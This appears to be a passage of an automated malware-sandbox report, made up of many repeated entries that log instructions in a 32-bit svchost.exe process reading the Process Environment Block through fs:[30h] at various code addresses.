Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_032380E9 mov eax, dword ptr fs:[00000030h] 2_2_032380E9
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_032B60E0 mov eax, dword ptr fs:[00000030h] 2_2_032B60E0
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_0322C0F0 mov eax, dword ptr fs:[00000030h] 2_2_0322C0F0
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_032720F0 mov ecx, dword ptr fs:[00000030h] 2_2_032720F0
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_032B20DE mov eax, dword ptr fs:[00000030h] 2_2_032B20DE
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_0326C720 mov eax, dword ptr fs:[00000030h] 2_2_0326C720
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_0326C720 mov eax, dword ptr fs:[00000030h] 2_2_0326C720
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_0326273C mov eax, dword ptr fs:[00000030h] 2_2_0326273C
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_0326273C mov ecx, dword ptr fs:[00000030h] 2_2_0326273C
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_0326273C mov eax, dword ptr fs:[00000030h] 2_2_0326273C
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_032AC730 mov eax, dword ptr fs:[00000030h] 2_2_032AC730
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_0326C700 mov eax, dword ptr fs:[00000030h] 2_2_0326C700
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03230710 mov eax, dword ptr fs:[00000030h] 2_2_03230710
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03260710 mov eax, dword ptr fs:[00000030h] 2_2_03260710
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03238770 mov eax, dword ptr fs:[00000030h] 2_2_03238770
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03240770 mov eax, dword ptr fs:[00000030h] 2_2_03240770
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03240770 mov eax, dword ptr fs:[00000030h] 2_2_03240770
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03240770 mov eax, dword ptr fs:[00000030h] 2_2_03240770
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03240770 mov eax, dword ptr fs:[00000030h] 2_2_03240770
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03240770 mov eax, dword ptr fs:[00000030h] 2_2_03240770
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03240770 mov eax, dword ptr fs:[00000030h] 2_2_03240770
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03240770 mov eax, dword ptr fs:[00000030h] 2_2_03240770
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03240770 mov eax, dword ptr fs:[00000030h] 2_2_03240770
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03240770 mov eax, dword ptr fs:[00000030h] 2_2_03240770
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03240770 mov eax, dword ptr fs:[00000030h] 2_2_03240770
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03240770 mov eax, dword ptr fs:[00000030h] 2_2_03240770
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03240770 mov eax, dword ptr fs:[00000030h] 2_2_03240770
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_0326674D mov esi, dword ptr fs:[00000030h] 2_2_0326674D
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_0326674D mov eax, dword ptr fs:[00000030h] 2_2_0326674D
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_0326674D mov eax, dword ptr fs:[00000030h] 2_2_0326674D
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03230750 mov eax, dword ptr fs:[00000030h] 2_2_03230750
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_032BE75D mov eax, dword ptr fs:[00000030h] 2_2_032BE75D
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03272750 mov eax, dword ptr fs:[00000030h] 2_2_03272750
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03272750 mov eax, dword ptr fs:[00000030h] 2_2_03272750
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_032B4755 mov eax, dword ptr fs:[00000030h] 2_2_032B4755
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_032307AF mov eax, dword ptr fs:[00000030h] 2_2_032307AF
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_032E47A0 mov eax, dword ptr fs:[00000030h] 2_2_032E47A0
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_032D678E mov eax, dword ptr fs:[00000030h] 2_2_032D678E
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_032527ED mov eax, dword ptr fs:[00000030h] 2_2_032527ED
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_032527ED mov eax, dword ptr fs:[00000030h] 2_2_032527ED
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_032527ED mov eax, dword ptr fs:[00000030h] 2_2_032527ED
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_032BE7E1 mov eax, dword ptr fs:[00000030h] 2_2_032BE7E1
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_032347FB mov eax, dword ptr fs:[00000030h] 2_2_032347FB
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_032347FB mov eax, dword ptr fs:[00000030h] 2_2_032347FB
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_0323C7C0 mov eax, dword ptr fs:[00000030h] 2_2_0323C7C0
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_032B07C3 mov eax, dword ptr fs:[00000030h] 2_2_032B07C3
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_0324E627 mov eax, dword ptr fs:[00000030h] 2_2_0324E627
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03266620 mov eax, dword ptr fs:[00000030h] 2_2_03266620
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03268620 mov eax, dword ptr fs:[00000030h] 2_2_03268620
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_0323262C mov eax, dword ptr fs:[00000030h] 2_2_0323262C
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_032AE609 mov eax, dword ptr fs:[00000030h] 2_2_032AE609
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_0324260B mov eax, dword ptr fs:[00000030h] 2_2_0324260B
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_0324260B mov eax, dword ptr fs:[00000030h] 2_2_0324260B
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_0324260B mov eax, dword ptr fs:[00000030h] 2_2_0324260B
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_0324260B mov eax, dword ptr fs:[00000030h] 2_2_0324260B
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_0324260B mov eax, dword ptr fs:[00000030h] 2_2_0324260B
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_0324260B mov eax, dword ptr fs:[00000030h] 2_2_0324260B
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_0324260B mov eax, dword ptr fs:[00000030h] 2_2_0324260B
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03272619 mov eax, dword ptr fs:[00000030h] 2_2_03272619
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_032F866E mov eax, dword ptr fs:[00000030h] 2_2_032F866E
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_032F866E mov eax, dword ptr fs:[00000030h] 2_2_032F866E
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_0326A660 mov eax, dword ptr fs:[00000030h] 2_2_0326A660
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_0326A660 mov eax, dword ptr fs:[00000030h] 2_2_0326A660
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03262674 mov eax, dword ptr fs:[00000030h] 2_2_03262674
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_0324C640 mov eax, dword ptr fs:[00000030h] 2_2_0324C640
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_0326C6A6 mov eax, dword ptr fs:[00000030h] 2_2_0326C6A6
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_032666B0 mov eax, dword ptr fs:[00000030h] 2_2_032666B0
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03234690 mov eax, dword ptr fs:[00000030h] 2_2_03234690
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03234690 mov eax, dword ptr fs:[00000030h] 2_2_03234690
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_032AE6F2 mov eax, dword ptr fs:[00000030h] 2_2_032AE6F2
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_032AE6F2 mov eax, dword ptr fs:[00000030h] 2_2_032AE6F2
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_032AE6F2 mov eax, dword ptr fs:[00000030h] 2_2_032AE6F2
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_032AE6F2 mov eax, dword ptr fs:[00000030h] 2_2_032AE6F2
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_032B06F1 mov eax, dword ptr fs:[00000030h] 2_2_032B06F1
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_032B06F1 mov eax, dword ptr fs:[00000030h] 2_2_032B06F1
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_0326A6C7 mov ebx, dword ptr fs:[00000030h] 2_2_0326A6C7
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_0326A6C7 mov eax, dword ptr fs:[00000030h] 2_2_0326A6C7
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03240535 mov eax, dword ptr fs:[00000030h] 2_2_03240535
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03240535 mov eax, dword ptr fs:[00000030h] 2_2_03240535
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03240535 mov eax, dword ptr fs:[00000030h] 2_2_03240535
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03240535 mov eax, dword ptr fs:[00000030h] 2_2_03240535
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03240535 mov eax, dword ptr fs:[00000030h] 2_2_03240535
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03240535 mov eax, dword ptr fs:[00000030h] 2_2_03240535
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_0325E53E mov eax, dword ptr fs:[00000030h] 2_2_0325E53E
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_0325E53E mov eax, dword ptr fs:[00000030h] 2_2_0325E53E
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_0325E53E mov eax, dword ptr fs:[00000030h] 2_2_0325E53E
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_0325E53E mov eax, dword ptr fs:[00000030h] 2_2_0325E53E
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_0325E53E mov eax, dword ptr fs:[00000030h] 2_2_0325E53E
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_032C6500 mov eax, dword ptr fs:[00000030h] 2_2_032C6500
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03304500 mov eax, dword ptr fs:[00000030h] 2_2_03304500
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03304500 mov eax, dword ptr fs:[00000030h] 2_2_03304500
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03304500 mov eax, dword ptr fs:[00000030h] 2_2_03304500
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03304500 mov eax, dword ptr fs:[00000030h] 2_2_03304500
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03304500 mov eax, dword ptr fs:[00000030h] 2_2_03304500
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03304500 mov eax, dword ptr fs:[00000030h] 2_2_03304500
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03304500 mov eax, dword ptr fs:[00000030h] 2_2_03304500
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_0326656A mov eax, dword ptr fs:[00000030h] 2_2_0326656A
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_0326656A mov eax, dword ptr fs:[00000030h] 2_2_0326656A
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_0326656A mov eax, dword ptr fs:[00000030h] 2_2_0326656A
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03238550 mov eax, dword ptr fs:[00000030h] 2_2_03238550
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03238550 mov eax, dword ptr fs:[00000030h] 2_2_03238550
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_032B05A7 mov eax, dword ptr fs:[00000030h] 2_2_032B05A7
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_032B05A7 mov eax, dword ptr fs:[00000030h] 2_2_032B05A7
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_032B05A7 mov eax, dword ptr fs:[00000030h] 2_2_032B05A7
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_032545B1 mov eax, dword ptr fs:[00000030h] 2_2_032545B1
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_032545B1 mov eax, dword ptr fs:[00000030h] 2_2_032545B1
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03232582 mov eax, dword ptr fs:[00000030h] 2_2_03232582
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03232582 mov ecx, dword ptr fs:[00000030h] 2_2_03232582
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03264588 mov eax, dword ptr fs:[00000030h] 2_2_03264588
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_0326E59C mov eax, dword ptr fs:[00000030h] 2_2_0326E59C
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_0325E5E7 mov eax, dword ptr fs:[00000030h] 2_2_0325E5E7
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_0325E5E7 mov eax, dword ptr fs:[00000030h] 2_2_0325E5E7
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_0325E5E7 mov eax, dword ptr fs:[00000030h] 2_2_0325E5E7
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_0325E5E7 mov eax, dword ptr fs:[00000030h] 2_2_0325E5E7
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_0325E5E7 mov eax, dword ptr fs:[00000030h] 2_2_0325E5E7
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_0325E5E7 mov eax, dword ptr fs:[00000030h] 2_2_0325E5E7
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_0325E5E7 mov eax, dword ptr fs:[00000030h] 2_2_0325E5E7
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_0325E5E7 mov eax, dword ptr fs:[00000030h] 2_2_0325E5E7
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_032325E0 mov eax, dword ptr fs:[00000030h] 2_2_032325E0
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_0326C5ED mov eax, dword ptr fs:[00000030h] 2_2_0326C5ED
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_0326C5ED mov eax, dword ptr fs:[00000030h] 2_2_0326C5ED
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_0326E5CF mov eax, dword ptr fs:[00000030h] 2_2_0326E5CF
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_0326E5CF mov eax, dword ptr fs:[00000030h] 2_2_0326E5CF
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_032365D0 mov eax, dword ptr fs:[00000030h] 2_2_032365D0
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_0326A5D0 mov eax, dword ptr fs:[00000030h] 2_2_0326A5D0
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_0326A5D0 mov eax, dword ptr fs:[00000030h] 2_2_0326A5D0
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_0322E420 mov eax, dword ptr fs:[00000030h] 2_2_0322E420
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_0322E420 mov eax, dword ptr fs:[00000030h] 2_2_0322E420
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_0322E420 mov eax, dword ptr fs:[00000030h] 2_2_0322E420
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_0322C427 mov eax, dword ptr fs:[00000030h] 2_2_0322C427
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_032B6420 mov eax, dword ptr fs:[00000030h] 2_2_032B6420
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_032B6420 mov eax, dword ptr fs:[00000030h] 2_2_032B6420
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_032B6420 mov eax, dword ptr fs:[00000030h] 2_2_032B6420
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_032B6420 mov eax, dword ptr fs:[00000030h] 2_2_032B6420
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_032B6420 mov eax, dword ptr fs:[00000030h] 2_2_032B6420
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_032B6420 mov eax, dword ptr fs:[00000030h] 2_2_032B6420
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_032B6420 mov eax, dword ptr fs:[00000030h] 2_2_032B6420
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_0326A430 mov eax, dword ptr fs:[00000030h] 2_2_0326A430
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03268402 mov eax, dword ptr fs:[00000030h] 2_2_03268402
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03268402 mov eax, dword ptr fs:[00000030h] 2_2_03268402
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03268402 mov eax, dword ptr fs:[00000030h] 2_2_03268402
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_032BC460 mov ecx, dword ptr fs:[00000030h] 2_2_032BC460
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_0325A470 mov eax, dword ptr fs:[00000030h] 2_2_0325A470
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_0325A470 mov eax, dword ptr fs:[00000030h] 2_2_0325A470
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_0325A470 mov eax, dword ptr fs:[00000030h] 2_2_0325A470
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_0326E443 mov eax, dword ptr fs:[00000030h] 2_2_0326E443
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_0326E443 mov eax, dword ptr fs:[00000030h] 2_2_0326E443
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_0326E443 mov eax, dword ptr fs:[00000030h] 2_2_0326E443
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_0326E443 mov eax, dword ptr fs:[00000030h] 2_2_0326E443
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_0326E443 mov eax, dword ptr fs:[00000030h] 2_2_0326E443
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_0326E443 mov eax, dword ptr fs:[00000030h] 2_2_0326E443
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_0326E443 mov eax, dword ptr fs:[00000030h] 2_2_0326E443
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_0326E443 mov eax, dword ptr fs:[00000030h] 2_2_0326E443
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_032EA456 mov eax, dword ptr fs:[00000030h] 2_2_032EA456
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_0322645D mov eax, dword ptr fs:[00000030h] 2_2_0322645D
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_0325245A mov eax, dword ptr fs:[00000030h] 2_2_0325245A
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_032364AB mov eax, dword ptr fs:[00000030h] 2_2_032364AB
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_032644B0 mov ecx, dword ptr fs:[00000030h] 2_2_032644B0
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_032BA4B0 mov eax, dword ptr fs:[00000030h] 2_2_032BA4B0
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_032EA49A mov eax, dword ptr fs:[00000030h] 2_2_032EA49A
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_032304E5 mov ecx, dword ptr fs:[00000030h] 2_2_032304E5
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_0325EB20 mov eax, dword ptr fs:[00000030h] 2_2_0325EB20
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_0325EB20 mov eax, dword ptr fs:[00000030h] 2_2_0325EB20
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_032F8B28 mov eax, dword ptr fs:[00000030h] 2_2_032F8B28
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_032F8B28 mov eax, dword ptr fs:[00000030h] 2_2_032F8B28
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_032AEB1D mov eax, dword ptr fs:[00000030h] 2_2_032AEB1D
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_032AEB1D mov eax, dword ptr fs:[00000030h] 2_2_032AEB1D
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_032AEB1D mov eax, dword ptr fs:[00000030h] 2_2_032AEB1D
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_032AEB1D mov eax, dword ptr fs:[00000030h] 2_2_032AEB1D
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_032AEB1D mov eax, dword ptr fs:[00000030h] 2_2_032AEB1D
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_032AEB1D mov eax, dword ptr fs:[00000030h] 2_2_032AEB1D
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_032AEB1D mov eax, dword ptr fs:[00000030h] 2_2_032AEB1D
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_032AEB1D mov eax, dword ptr fs:[00000030h] 2_2_032AEB1D
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_032AEB1D mov eax, dword ptr fs:[00000030h] 2_2_032AEB1D
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_0322CB7E mov eax, dword ptr fs:[00000030h] 2_2_0322CB7E
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_032E4B4B mov eax, dword ptr fs:[00000030h] 2_2_032E4B4B
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_032E4B4B mov eax, dword ptr fs:[00000030h] 2_2_032E4B4B
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_032C6B40 mov eax, dword ptr fs:[00000030h] 2_2_032C6B40
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_032C6B40 mov eax, dword ptr fs:[00000030h] 2_2_032C6B40
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_032FAB40 mov eax, dword ptr fs:[00000030h] 2_2_032FAB40
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_032D8B42 mov eax, dword ptr fs:[00000030h] 2_2_032D8B42
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_032DEB50 mov eax, dword ptr fs:[00000030h] 2_2_032DEB50
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03240BBE mov eax, dword ptr fs:[00000030h] 2_2_03240BBE
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03240BBE mov eax, dword ptr fs:[00000030h] 2_2_03240BBE
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_032E4BB0 mov eax, dword ptr fs:[00000030h] 2_2_032E4BB0
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_032E4BB0 mov eax, dword ptr fs:[00000030h] 2_2_032E4BB0
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03238BF0 mov eax, dword ptr fs:[00000030h] 2_2_03238BF0
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03238BF0 mov eax, dword ptr fs:[00000030h] 2_2_03238BF0
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03238BF0 mov eax, dword ptr fs:[00000030h] 2_2_03238BF0
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_0325EBFC mov eax, dword ptr fs:[00000030h] 2_2_0325EBFC
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_032BCBF0 mov eax, dword ptr fs:[00000030h] 2_2_032BCBF0
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03250BCB mov eax, dword ptr fs:[00000030h] 2_2_03250BCB
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03250BCB mov eax, dword ptr fs:[00000030h] 2_2_03250BCB
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03250BCB mov eax, dword ptr fs:[00000030h] 2_2_03250BCB
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03230BCD mov eax, dword ptr fs:[00000030h] 2_2_03230BCD
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03230BCD mov eax, dword ptr fs:[00000030h] 2_2_03230BCD
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03230BCD mov eax, dword ptr fs:[00000030h] 2_2_03230BCD
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_032DEBD0 mov eax, dword ptr fs:[00000030h] 2_2_032DEBD0
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_0326CA24 mov eax, dword ptr fs:[00000030h] 2_2_0326CA24
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_0325EA2E mov eax, dword ptr fs:[00000030h] 2_2_0325EA2E
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03254A35 mov eax, dword ptr fs:[00000030h] 2_2_03254A35
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03254A35 mov eax, dword ptr fs:[00000030h] 2_2_03254A35
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_0326CA38 mov eax, dword ptr fs:[00000030h] 2_2_0326CA38
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_032BCA11 mov eax, dword ptr fs:[00000030h] 2_2_032BCA11
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_0326CA6F mov eax, dword ptr fs:[00000030h] 2_2_0326CA6F
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_0326CA6F mov eax, dword ptr fs:[00000030h] 2_2_0326CA6F
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_0326CA6F mov eax, dword ptr fs:[00000030h] 2_2_0326CA6F
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_032DEA60 mov eax, dword ptr fs:[00000030h] 2_2_032DEA60
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_032ACA72 mov eax, dword ptr fs:[00000030h] 2_2_032ACA72
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_032ACA72 mov eax, dword ptr fs:[00000030h] 2_2_032ACA72
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03236A50 mov eax, dword ptr fs:[00000030h] 2_2_03236A50
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03236A50 mov eax, dword ptr fs:[00000030h] 2_2_03236A50
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03236A50 mov eax, dword ptr fs:[00000030h] 2_2_03236A50
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03236A50 mov eax, dword ptr fs:[00000030h] 2_2_03236A50
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03236A50 mov eax, dword ptr fs:[00000030h] 2_2_03236A50
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03236A50 mov eax, dword ptr fs:[00000030h] 2_2_03236A50
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03236A50 mov eax, dword ptr fs:[00000030h] 2_2_03236A50
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03240A5B mov eax, dword ptr fs:[00000030h] 2_2_03240A5B
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03240A5B mov eax, dword ptr fs:[00000030h] 2_2_03240A5B
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03238AA0 mov eax, dword ptr fs:[00000030h] 2_2_03238AA0
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03238AA0 mov eax, dword ptr fs:[00000030h] 2_2_03238AA0
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03286AA4 mov eax, dword ptr fs:[00000030h] 2_2_03286AA4
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_0323EA80 mov eax, dword ptr fs:[00000030h] 2_2_0323EA80
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_0323EA80 mov eax, dword ptr fs:[00000030h] 2_2_0323EA80
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_0323EA80 mov eax, dword ptr fs:[00000030h] 2_2_0323EA80
